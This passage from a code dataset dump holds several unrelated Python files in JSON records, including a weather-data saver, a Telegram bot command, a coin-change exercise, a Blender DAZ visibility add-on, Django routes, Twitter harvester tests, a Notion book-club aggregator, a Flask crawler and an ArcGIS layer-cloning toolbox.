I don't care if\n            # it's overwritten, however it may/may not represent the ^latest^ so \n            # remember the date as a string is in the output description.\n            # GENERIC (default)\n            # uses generic name as this is easy to call when updating\n            # using remote code\n            #\n            if options.rename: \n                # build unique filename: YYYY, MMM, DD, 'T' and 24HH\n                fn = time.strftime(\"%Y%b%dT%H\").upper()\n                # build the header name from the bare timestamp first, then\n                # add the data extension (the old order produced \".JSON-header.json\")\n                fnh = \"{}-header.json\".format(fn)\n                fn = \"{}.json\".format(fn)\n            else:\n                # different fn, don't overwrite detailed fn. \n                # use default fn for simplified, extracted data\n                fn = WEATHER_DATA_SIMPLE_FN\n                fnh = WEATHER_DATA_SIMPLE_HEAD_FN \n\n            # filepath with destination path \n            fpn = os.path.join(DEST_PATH, fn)\n            fpnh = os.path.join(DEST_PATH, fnh) \n            #--------\n\n\n            #---------\n            # data format:\n            # convert data to json, making sure it's easy to read\n            jd = json.dumps(d, ensure_ascii=False,\n                            indent=4,\n                            sort_keys=True)\n            jdh = json.dumps(h, ensure_ascii=False,\n                             indent=4,\n                             sort_keys=True)\n            #---------\n\n\n            #--------\n            # save simple weather DATA file\n            with open(fpn, 'w') as f:\n                f.write(jd)\n                f.close()\n            # save simple weather HEADER file\n            with open(fpnh, 'w') as f:\n                f.write(jdh)\n                f.close()\n            #--------\n\n            sys.exit(0)\n        else:\n            sys.stderr.write(\"Error: cannot locate file to extract\")\n    \n    # what? display help\n    else:\n        parser.print_help() \n    \n\n\nif __name__ == \"__main__\":\n    main()\n\n\n# vim: ff=unix:ts=4:sw=4:tw=78:noai:expandtab\n\n\n","repo_name":"peterrenshaw/wsd","sub_path":"wsd.py","file_name":"wsd.py","file_ext":"py","file_size_in_byte":15120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1636360376","text":"from tg_bot import dispatcher\r\nfrom tg_bot.modules.disable import DisableAbleCommandHandler\r\nfrom telegram import Update\r\nfrom telegram.ext import CallbackContext\r\n\r\n\r\ndef shout(update: Update, context: CallbackContext):\r\n    args = context.args\r\n    text = \" \".join(args)\r\n    result = []\r\n    result.append(\" \".join(list(text)))\r\n    for pos, symbol in enumerate(text[1:]):\r\n        result.append(symbol + \" \" + \" \" * pos + symbol)\r\n    result = list(\"\\n\".join(result))\r\n    result[0] = text[0]\r\n    result = \"\".join(result)\r\n    msg = \"```\\n\" + result + \"```\"\r\n    return update.effective_message.reply_text(msg, parse_mode=\"MARKDOWN\")\r\n\r\n\r\nSHOUT_HANDLER = DisableAbleCommandHandler(\r\n    \"shout\", shout, pass_args=True, run_async=True\r\n)\r\n\r\ndispatcher.add_handler(SHOUT_HANDLER)\r\n\r\n__command_list__ = [\"shout\"]\r\n__handlers__ = [SHOUT_HANDLER]\r\n","repo_name":"rshero/YuiiChan","sub_path":"tg_bot/modules/shout.py","file_name":"shout.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"3206093803","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n\n    coins = 0\n\n    while m:\n        while m - 10 >= 0:\n            m -= 10\n            coins += 1\n        while m - 5 >= 0:\n            m -= 5\n            coins += 1\n        while m - 1 >= 0:\n            m -= 1\n            coins += 1\n\n    return coins\n\n    # The below is a one-line answer...but it isn't greedy!\n    # return num % 5+((num-(num % 5)) % 10 // 5) + ((num - (num % 10)) // 10)\n\nif __name__ == '__main__':\n    num = int(sys.stdin.read())\n    
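# --- editor's note (worked example) ---
# For the shout module above, shout-ing the text "abc" produces the triangle
#     a b c
#     b b
#     c  c
# (the first row spaced out, then each later character echoed down a
# diagonal) before it is wrapped in a Markdown code block for Telegram.
# --- end note ---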
print(get_change(num))\n","repo_name":"lukewrites/Data-Structures-and-Algorithms","sub_path":"1_algorithmic_toolbox/wk3_change.py","file_name":"wk3_change.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71996246546","text":"# Copyright (c) 2016-2019, Thomas Larsson\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n#\r\n# 1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# The views and conclusions contained in the software and documentation are those\r\n# of the authors and should not be interpreted as representing official policies,\r\n# either expressed or implied, of the FreeBSD Project.\r\n\r\n\r\nimport bpy\r\nfrom bpy.props import *\r\n#from .drivers import *\r\nfrom .utils import *\r\nfrom .error import *\r\nif bpy.app.version < (2,80,0):\r\n from .buttons27 import PrefixString\r\nelse:\r\n from .buttons28 import PrefixString\r\n\r\n\r\ndef getMaskName(string):\r\n return \"Mask_\" + string.split(\".\",1)[0]\r\n\r\ndef getHidePropName(string):\r\n return \"Mhh\" + string.split(\".\",1)[0]\r\n\r\ndef getHideMannequinName():\r\n return \"MhhMannequin\"\r\n\r\n#------------------------------------------------------------------------\r\n# Setup: Add and remove hide drivers\r\n#------------------------------------------------------------------------\r\n\r\nclass HidersHandler:\r\n \r\n def execute(self, context):\r\n from .morphing import prettifyAll\r\n from .driver import updateAll\r\n rig = context.object\r\n for ob in self.getMeshesInGroup(context, rig):\r\n self.handleHideDrivers(ob, rig, context)\r\n setattr(ob, self.flag, self.value)\r\n setattr(rig, self.flag, self.value)\r\n prettifyAll(context)\r\n updateAll(context)\r\n setActiveObject(context, rig)\r\n return{'FINISHED'}\r\n\r\n\r\n def getMeshesInGroup(self, context, rig): \r\n self.collection = None \r\n meshes = list(rig.children)\r\n if bpy.app.version >= (2,80,0):\r\n for coll in bpy.data.collections:\r\n if rig in coll.all_objects.values():\r\n for ob in meshes:\r\n if ob in coll.all_objects.values():\r\n self.collection = coll\r\n return meshes\r\n return meshes\r\n\r\n\r\n def handleHideDrivers(self, clo, rig, context):\r\n if clo.DazMannequin:\r\n prop = 
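# --- editor's note (worked example) ---
# get_change() above is greedy over the coin set {10, 5, 1}; for example
# m = 28 -> 10 + 10 + 5 + 1 + 1 + 1, i.e. 6 coins:
#
#     assert get_change(28) == 6
#     assert get_change(0) == 0
# --- end note ---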
getHideMannequinName()\r\n return\r\n else:\r\n prop = getHidePropName(clo.name)\r\n self.handleProp(prop, clo, rig, context)\r\n if clo.DazMannequin:\r\n return \r\n modname = getMaskName(clo.name)\r\n for ob in rig.children:\r\n for mod in ob.modifiers:\r\n if (mod.type == 'MASK' and mod.name == modname):\r\n self.handleMod(prop, rig, mod)\r\n\r\n\r\nclass DAZ_OT_AddHiders(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.add_hide_drivers\"\r\n bl_label = \"Add Visibility Drivers\"\r\n bl_description = \"Control visibility with rig property. For file linking.\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityDrivers\"\r\n value = True\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and not ob.DazVisibilityDrivers)\r\n\r\n\r\n def handleProp(self, prop, clo, rig, context):\r\n from .driver import setBoolProp, makePropDriver\r\n if context.scene.DazHideOnlyMasked:\r\n masked = False\r\n for ob in rig.children:\r\n if ob.type == 'MESH':\r\n for mod in ob.modifiers:\r\n if (mod.type == 'MASK' and \r\n mod.name == getMaskName(clo.name)):\r\n masked = True\r\n break\r\n if not masked:\r\n return\r\n setBoolProp(rig, prop, True, \"Show %s\" % clo.name)\r\n makePropDriver(prop, clo, HideViewport, rig, expr=\"not(x)\")\r\n makePropDriver(prop, clo, \"hide_render\", rig, expr=\"not(x)\")\r\n\r\n \r\n def handleMod(self, prop, rig, mod):\r\n from .driver import makePropDriver\r\n makePropDriver(prop, mod, \"show_viewport\", rig, expr=\"x\")\r\n makePropDriver(prop, mod, \"show_render\", rig, expr=\"x\")\r\n\r\n\r\nclass DAZ_OT_RemoveHiders(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.remove_hide_drivers\"\r\n bl_label = \"Remove Visibility Drivers\"\r\n bl_description = \"Remove ability to control visibility from rig property\"\r\n bl_options = {'UNDO'}\r\n\r\n flag = \"DazVisibilityDrivers\"\r\n value = False\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and ob.DazVisibilityDrivers)\r\n\r\n def handleProp(self, prop, clo, rig, context):\r\n if prop in rig.keys():\r\n del rig[prop]\r\n clo.driver_remove(HideViewport)\r\n clo.driver_remove(\"hide_render\")\r\n\r\n def handleMod(self, prop, rig, mod):\r\n mod.driver_remove(\"show_viewport\")\r\n mod.driver_remove(\"show_render\")\r\n\r\n#------------------------------------------------------------------------\r\n# Hider collections\r\n#------------------------------------------------------------------------\r\n\r\nif bpy.app.version >= (2,80,0):\r\n \r\n class DAZ_OT_AddHiderCollections(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.add_hide_collections\"\r\n bl_label = \"Add Visibility Collections\"\r\n bl_description = \"Control visibility with rig property. 
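# --- editor's note (behaviour summary, inferred from the driver calls above) ---
# DAZ_OT_AddHiders gives the rig one boolean property per mesh (e.g. a mesh
# named "Shirt" gets "MhhShirt") and wires drivers so that, conceptually:
#     mesh.hide_viewport     = not rig["MhhShirt"]   # expr="not(x)"
#     mesh.hide_render       = not rig["MhhShirt"]
#     mask_mod.show_viewport = rig["MhhShirt"]       # expr="x"
# so a single toggle on the armature shows/hides both the mesh and its mask.
# --- end note ---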
For file linking.\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityCollections\"\r\n value = True\r\n \r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and not ob.DazVisibilityCollections)\r\n\r\n def getMeshesInGroup(self, context, rig):\r\n meshes = HidersHandler.getMeshesInGroup(self, context, rig)\r\n return [rig] + meshes\r\n \r\n def handleProp(self, prop, clo, rig, context):\r\n if self.collection is None:\r\n return\r\n subcoll = bpy.data.collections.new(clo.name)\r\n self.collection.children.link(subcoll)\r\n if clo in self.collection.objects.values():\r\n self.collection.objects.unlink(clo)\r\n subcoll.objects.link(clo)\r\n \r\n def handleMod(self, prop, rig, mod):\r\n return\r\n \r\n \r\n class DAZ_OT_RemoveHiderCollections(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.remove_hide_collections\"\r\n bl_label = \"Remove Visibility Collections\"\r\n bl_description = \"Remove ability to control visibility from rig property\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityCollections\"\r\n value = False\r\n \r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and ob.DazVisibilityCollections)\r\n \r\n def getMeshesInGroup(self, context, rig):\r\n meshes = HidersHandler.getMeshesInGroup(self, context, rig)\r\n return [rig] + meshes\r\n \r\n def handleProp(self, prop, clo, rig, context):\r\n if self.collection is None:\r\n return\r\n for subcoll in self.collection.children.values():\r\n if clo in subcoll.objects.values():\r\n if subcoll in self.collection.children.values():\r\n self.collection.children.unlink(subcoll)\r\n subcoll.objects.unlink(clo)\r\n self.collection.objects.link(clo)\r\n break\r\n \r\n def handleMod(self, prop, rig, mod):\r\n return\r\n\r\n#------------------------------------------------------------------------\r\n# Show/Hide all\r\n#------------------------------------------------------------------------\r\n\r\ndef setAllVisibility(context, prefix, value):\r\n from .morphing import autoKeyProp\r\n rig = context.object\r\n scn = context.scene\r\n if rig is None:\r\n return\r\n for key in rig.keys():\r\n if key[0:3] == prefix:\r\n if key:\r\n rig[key] = value\r\n autoKeyProp(rig, key, scn, scn.frame_current, True)\r\n updateScene(context)\r\n\r\n\r\nclass DAZ_OT_ShowAll(bpy.types.Operator, PrefixString):\r\n bl_idname = \"daz.show_all\"\r\n bl_label = \"Show All\"\r\n bl_description = \"Show all meshes/makeup of this rig\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n scn = context.scene\r\n setAllVisibility(context, self.prefix, True)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_HideAll(bpy.types.Operator, PrefixString):\r\n bl_idname = \"daz.hide_all\"\r\n bl_label = \"Hide All\"\r\n bl_description = \"Hide all meshes/makeup of this rig\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n scn = context.scene\r\n setAllVisibility(context, self.prefix, False)\r\n return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------------\r\n# Mask modifiers\r\n#------------------------------------------------------------------------\r\n\r\ndef createMaskModifiers(context, useSelectedOnly):\r\n from .proxy import getSelectedObjects\r\n selected,_ = getSelectedObjects(context, 'MESH')\r\n ob = context.object\r\n scn = context.scene\r\n rig = ob.parent\r\n print(\"Create masks for %s:\" % ob.name)\r\n if rig:\r\n for child in rig.children:\r\n if child.type == 
'ARMATURE' and child.children:\r\n mesh = child.children[0]\r\n elif child.type == 'MESH':\r\n mesh = child\r\n else:\r\n mesh = None\r\n if mesh and mesh != ob:\r\n if useSelectedOnly and mesh not in selected:\r\n continue\r\n mod = None\r\n for mod1 in ob.modifiers:\r\n modname = getMaskName(mesh.name)\r\n if mod1.type == 'MASK' and mod1.name == modname:\r\n mod = mod1\r\n if modname in ob.vertex_groups.keys():\r\n vgrp = ob.vertex_groups[modname]\r\n else:\r\n vgrp = ob.vertex_groups.new(name=modname)\r\n print(\" \", mesh.name)\r\n if mod is None:\r\n mod = ob.modifiers.new(modname, 'MASK')\r\n mod.vertex_group = modname\r\n mod.invert_vertex_group = True\r\n print(\"Masks created\")\r\n\r\n\r\nclass DAZ_OT_CreateMasks(bpy.types.Operator):\r\n bl_idname = \"daz.create_all_masks\"\r\n bl_label = \"Create All Masks\"\r\n bl_description = \"Create vertex groups and mask modifiers in active mesh for all meshes belonging to same character\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n createMaskModifiers(context, False)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_CreateSelectedMasks(bpy.types.Operator):\r\n bl_idname = \"daz.create_selected_masks\"\r\n bl_label = \"Create Selected Masks\"\r\n bl_description = \"Create vertex groups and mask modifiers in active mesh for selected meshes\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n createMaskModifiers(context, True)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n#----------------------------------------------------------\r\n# Create collections\r\n#----------------------------------------------------------\r\n\r\nclass DAZ_OT_CreateCollections(bpy.types.Operator):\r\n bl_idname = \"daz.create_collections\"\r\n bl_label = \"Create Collections\"\r\n bl_description = \"Create collections for each empty in scene\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n try:\r\n coll = context.collection\r\n for ob in list(coll.objects):\r\n if ob.type == 'EMPTY':\r\n subcoll = bpy.data.collections.new(ob.name)\r\n coll.children.link(subcoll)\r\n coll.objects.unlink(ob)\r\n subcoll.objects.link(ob)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n \r\n#----------------------------------------------------------\r\n# Initialize\r\n#----------------------------------------------------------\r\n\r\nclasses = [\r\n DAZ_OT_AddHiders,\r\n DAZ_OT_RemoveHiders,\r\n DAZ_OT_ShowAll,\r\n DAZ_OT_HideAll,\r\n DAZ_OT_CreateMasks,\r\n DAZ_OT_CreateSelectedMasks,\r\n]\r\n\r\nif bpy.app.version >= (2,80,0):\r\n classes += [\r\n DAZ_OT_AddHiderCollections,\r\n DAZ_OT_RemoveHiderCollections,\r\n DAZ_OT_CreateCollections,\r\n ]\r\n\r\ndef initialize():\r\n bpy.types.Object.DazVisibilityDrivers = BoolProperty(default = False)\r\n bpy.types.Object.DazVisibilityCollections = BoolProperty(default = False)\r\n\r\n bpy.types.Scene.DazHideOnlyMasked = BoolProperty(\r\n name = \"Hide Only Masked\",\r\n description = \"Create visibility drivers only for masked meshes\",\r\n default = False)\r\n\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n\r\n\r\ndef uninitialize():\r\n for cls in classes:\r\n 
bpy.utils.unregister_class(cls)\r\n\r\n\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":14507,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"25994859205","text":"from django.conf.urls import url\nfrom g4emma import views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^about/$', views.about, name='about'),\n url(r'^manual/$', views.manual, name='manual'),\n url(r'^simulation/$', views.simulation, name='simulation'),\n url(r'^tools/$', views.tools, name='tools'),\n url(r'^results/$', views.results, name='results'),\n url(r'^progress/$', views.progress, name='progress'),\n url(r'^tools/rigidity/$', views.rigidity, name='rigidity'),\n url(r'^tools/energy_loss/$', views.energy_loss, name='energy_loss'),\n url(r'^tools/charge_state/$', views.charge_state, name='charge_state'),\n url(r'^tools/charge_state_results/$', views.charge_state_results, name='charge_state_results'),\n url(r'^tools/multiple_scattering/$', views.multiple_scattering, name='multiple_scattering'), \n url(r'^tools/multiple_scattering/multiple_scattering_info/$', views.multiple_scattering_info, name='multiple_scattering_info'),\n url(r'^tools/transmission_efficiency/$', views.transmission_efficiency_view, name='transmission_efficiency'),\n]\n","repo_name":"julianaangel/emma-site","sub_path":"g4emma/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43426379393","text":"import tests\nimport socialfeedharvester.fetchables.twitter as twitter\nfrom mock import MagicMock\nfrom sfh import SocialFeedHarvester\nfrom socialfeedharvester.fetchables.resource import Image, UnknownResource\n\n\nclass TestTwitter(tests.TestCase):\n def setUp(self):\n if not tests.test_config_available:\n self.skipTest(\"Skipping test since test config not available.\")\n self.api = twitter.client_manager.get_client(tests.TWITTER_CONSUMER_KEY, tests.TWITTER_CONSUMER_SECRET,\n access_token=tests.TWITTER_ACCESS_TOKEN,\n access_token_secret=tests.TWITTER_ACCESS_TOKEN_SECRET)\n self.mock_sfh = MagicMock(spec=SocialFeedHarvester)\n self.mock_sfh.get_auth.return_value= {\"consumer_key\": tests.TWITTER_CONSUMER_KEY,\n \"consumer_secret\": tests.TWITTER_CONSUMER_SECRET,\n \"access_token\": tests.TWITTER_ACCESS_TOKEN,\n \"access_token_secret\": tests.TWITTER_ACCESS_TOKEN_SECRET}\n\n def test_lookup_user_ids(self):\n user_ids = twitter.lookup_user_ids((\"jlittman_dev\", \"xjlittman_dev\"), self.api)\n self.assertEqual(1, len(user_ids))\n self.assertEqual(2875189485, user_ids[\"jlittman_dev\"])\n\n def test_user_timeline(self):\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=False)\n\n #Hostname\n self.assertEqual(\"api.twitter.com\", u.hostname)\n\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #3 pages\n self.assertEqual(6, len(warc_records))\n #First should be a request\n self.assertEqual(\"request\", warc_records[0].type)\n self.assertEqual(\n \"https://api.twitter.com/1.1/statuses/user_timeline.json?count=3&page=1&screen_name=jlittman_dev\",\n warc_records[0].url)\n #And second a response\n self.assertEqual(\"response\", warc_records[1].type)\n self.assertEqual(\n \"https://api.twitter.com/1.1/statuses/user_timeline.json?count=3&page=1&screen_name=jlittman_dev\",\n warc_records[1].url)\n\n #Fetchables\n self.assertEqual(2, 
len(fetchables))\n self.assertIsInstance(fetchables[0], UnknownResource)\n self.assertIsInstance(fetchables[1], Image)\n\n self.mock_sfh.get_auth.assert_called_with(\"twitter\")\n\n def test_incremental_user_timeline_no_prev_state(self):\n self.mock_sfh.get_state.return_value = None\n\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=True)\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #3 pages\n self.assertEqual(6, len(warc_records))\n\n #Fetchables\n self.assertEqual(2, len(fetchables))\n\n self.mock_sfh.get_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\")\n self.mock_sfh.set_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\",\n \"577866396094242816\")\n\n def test_incremental_user_timeline(self):\n self.mock_sfh.get_state.return_value = \"577868039284088832\"\n\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=True)\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #2 pages\n self.assertEqual(4, len(warc_records))\n\n self.mock_sfh.get_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\")\n self.mock_sfh.set_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\",\n \"577866396094242816\")\n","repo_name":"gwu-libraries/social-feed-harvester","sub_path":"tests/fetchables/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23366885302","text":"import argparse\nimport asyncio\nimport logging\nimport os\n\nfrom dotenv import load_dotenv\n\nfrom book_club_aggregator import BookClubAggregator\nfrom book_manager import BookManager\nfrom csv_reader import CSVReader\nfrom notion_db_API import NotionDBAPI\n\n\nasync def main(ratings_file: str = None):\n load_dotenv()\n\n print(\"Initializing the Book Club Aggregator...\")\n\n if ratings_file is None:\n # Get the current file directory\n current_dir = os.path.dirname(os.path.abspath(__file__))\n\n # Navigate up one level\n parent_dir = os.path.dirname(current_dir)\n\n # Define the file path for CSV data\n file_path = os.path.join(os.path.join(parent_dir, \"data\"), \"ratings.csv\")\n else:\n file_path = ratings_file\n\n print(f\"Reading data from CSV file: '{file_path}'\")\n\n # Read data from the CSV file\n book_data = CSVReader.read_data(file_path)\n print(\"Data successfully loaded from the CSV file.\")\n print()\n\n # Create a BookClubAggregator instance\n book_club_aggregator = BookClubAggregator(book_data)\n\n # Display statistics\n print(\"Calculating and displaying statistics:\")\n book_club_aggregator.display_stats()\n print()\n\n # Aggregate book statistics\n ratings_new = book_club_aggregator.aggregate_book_stats()\n print(\"Book statistics aggregated successfully.\")\n\n # Create a book manager instance to interact with the Notion database\n book_manager = BookManager(api=NotionDBAPI())\n print(\"Connected to the Notion database.\")\n\n # Get existing ratings from the Notion database\n ratings_existing = await book_manager.get_existing_ratings()\n print(\"Retrieved existing ratings from the Notion database.\")\n\n print(\"Updating the Notion database...\")\n\n # Update the Notion database\n await book_manager.upsert_books_to_database(ratings_new, 
ratings_existing)\n\n print(\"Notion database updated.\")\n\n print(\"All Done! 🎊\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.ERROR)\n\n # Create a command-line argument parser\n parser = argparse.ArgumentParser(description=\"Book Club Aggregator\")\n\n # Add an optional argument to specify the input ratings file\n parser.add_argument(\n \"--csv_path\",\n help=\"Input ratings file (default: use hardcoded file at 'data/ratings.csv')\",\n default=None,\n )\n\n # Parse the command-line arguments\n args = parser.parse_args()\n\n # Call the main function with the ratings file argument\n asyncio.run(main(args.csv_path))\n","repo_name":"ChocoTonic/notion_book_club_aggregator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19522528150","text":"from flask import abort, Flask, jsonify, make_response, request\n\nimport crawler.cfg as cfg\nfrom crawler.common import logger as logger\nfrom crawler.crawl import Crawler\n\n# Flask api server\napp = Flask(__name__)\n\n\n# Not Found\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n# Health check\n@app.route('/_health')\ndef health():\n return jsonify({'msg':\"I am ok!\"})\n\n\n# Crawler endpoint\n@app.route('/crawl', methods=['POST'])\ndef create_task():\n\n # Validate request body\n if not request.json or not 'url' in request.json:\n abort(400)\n\n # url to crawl\n url = request.json.get('url')\n logger.info(\"Request received to crawl: '%s'\" % url)\n\n # Initialize crawler\n crawler = Crawler(url)\n\n # Start crawling\n sitemap, failed = crawler.start()\n\n return jsonify({'url': url, 'failed': failed, 'sitemap': sitemap}), 201\n\n\nif __name__ == '__main__':\n app.run(port=cfg.PORT, debug=True, host='0.0.0.0')\n","repo_name":"kanchwala-yusuf/sitemap-generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13524812835","text":"# -*- coding: utf-8 -*-\n\nimport arcpy\nfrom datetime import datetime\nimport os\nimport traceback\n\n\nclass Toolbox(object):\n def __init__(self):\n \"\"\"Define the toolbox (the name of the toolbox is the name of the\n .pyt file).\"\"\"\n self.label = \"Toolbox\"\n self.alias = \"toolbox\"\n\n # List of tool classes associated with this toolbox\n self.tools = [LayerCloner]\n\n\nclass LayerCloner(object):\n def __init__(self):\n \"\"\"Define the tool (tool name is the name of the class).\"\"\"\n self.label = \"Layer Cloner\"\n self.description = \"Clone one or more layers with the current date suffix\"\n self.canRunInBackground = False\n\n def getParameterInfo(self):\n \"\"\"Define parameter definitions\"\"\"\n param0 = arcpy.Parameter(\n displayName=\"Select Features to Clone:\",\n name=\"in_features\",\n multiValue=True,\n datatype=[\"GPFeatureLayer\"],\n parameterType=\"Required\",\n )\n param1 = arcpy.Parameter(\n displayName=\"Cloned Output Name:\",\n name=\"out_features\",\n multiValue=True,\n datatype=\"String\",\n enabled=False,\n )\n param2 = arcpy.Parameter(\n displayName=\"Geodatabase Output Location (Workspace)\",\n name=\"in_workspace\",\n datatype=\"DEWorkspace\",\n enabled=True,\n direction=\"Input\",\n parameterType=\"Required\"\n )\n param2.defaultEnvironmentName = \"Workspace\"\n\n params = [param0, param1, param2]\n return 
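# --- editor's note (hypothetical smoke test) ---
# Exercising the /crawl endpoint of the Flask crawler above, assuming the
# server is running locally and cfg.PORT is 5000:
#
#     import requests
#     r = requests.post("http://localhost:5000/crawl",
#                       json={"url": "https://example.com"})
#     print(r.status_code)  # 201 on success
#     print(r.json())       # {'url': ..., 'failed': ..., 'sitemap': ...}
# --- end note ---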
params\n\n    def isLicensed(self):\n        \"\"\"Set whether tool is licensed to execute.\"\"\"\n        return True\n\n    def updateParameters(self, parameters):\n        \"\"\"Modify the values and properties of parameters before internal\n        validation is performed. This method is called whenever a parameter\n        has been changed.\"\"\"\n        cur_date = datetime.now().strftime(\"%Y%m%d\")\n        if parameters[0].values:\n            layer_names = []\n            for p in parameters[0].values:\n                layer_names.append(p.name + \"_\" + cur_date)\n\n            layer_names_str = \";\".join(layer_names)\n            parameters[1].value = layer_names_str\n\n        parameters[1].enabled = True\n        return\n\n    def updateMessages(self, parameters):\n        \"\"\"Modify the messages created by internal validation for each tool\n        parameter. This method is called after internal validation.\"\"\"\n        return\n\n    def execute(self, parameters, messages):\n        \"\"\"The source code of the tool.\"\"\"\n        try:\n            wkspc = parameters[2].valueAsText\n            arcpy.AddMessage(f\"Workspace: {wkspc}\\n\")\n\n            #Export copies of selected Features\n            inFeatures = parameters[0].values\n            outNames = parameters[1].values\n\n            for index, item in enumerate(inFeatures):\n                # arcpy.AddMessage(f'Index: {index}, Feature: {item.name}, Data Source: {item.dataSource}')\n                outPath = os.path.join(wkspc, outNames[index])\n                # arcpy.AddMessage(f'Output Path: {outPath}')\n                \n                if item.dataSource.lower()[-4:] == \".shp\":\n                    #arcpy.AddMessage(\"Feature is a shapefile\")\n                    arcpy.conversion.FeatureClassToFeatureClass(item.dataSource, wkspc, outNames[index])\n                    arcpy.AddMessage(f\"'{item.name}' was converted from a Shapefile to a GDB Feature Layer and renamed {outNames[index]}\")\n                else:\n                    #arcpy.AddMessage(\"Feature Layer detected\")\n                    arcpy.management.Copy(item.dataSource, outPath) \n                    arcpy.AddMessage(f\"'{item.name}' copied to the workspace GDB and renamed {outNames[index]}\")\n\n            return\n        except Exception:\n            arcpy.AddMessage(f'An error occurred\\n{traceback.format_exc()}')\n\n\n    def postExecute(self, parameters):\n    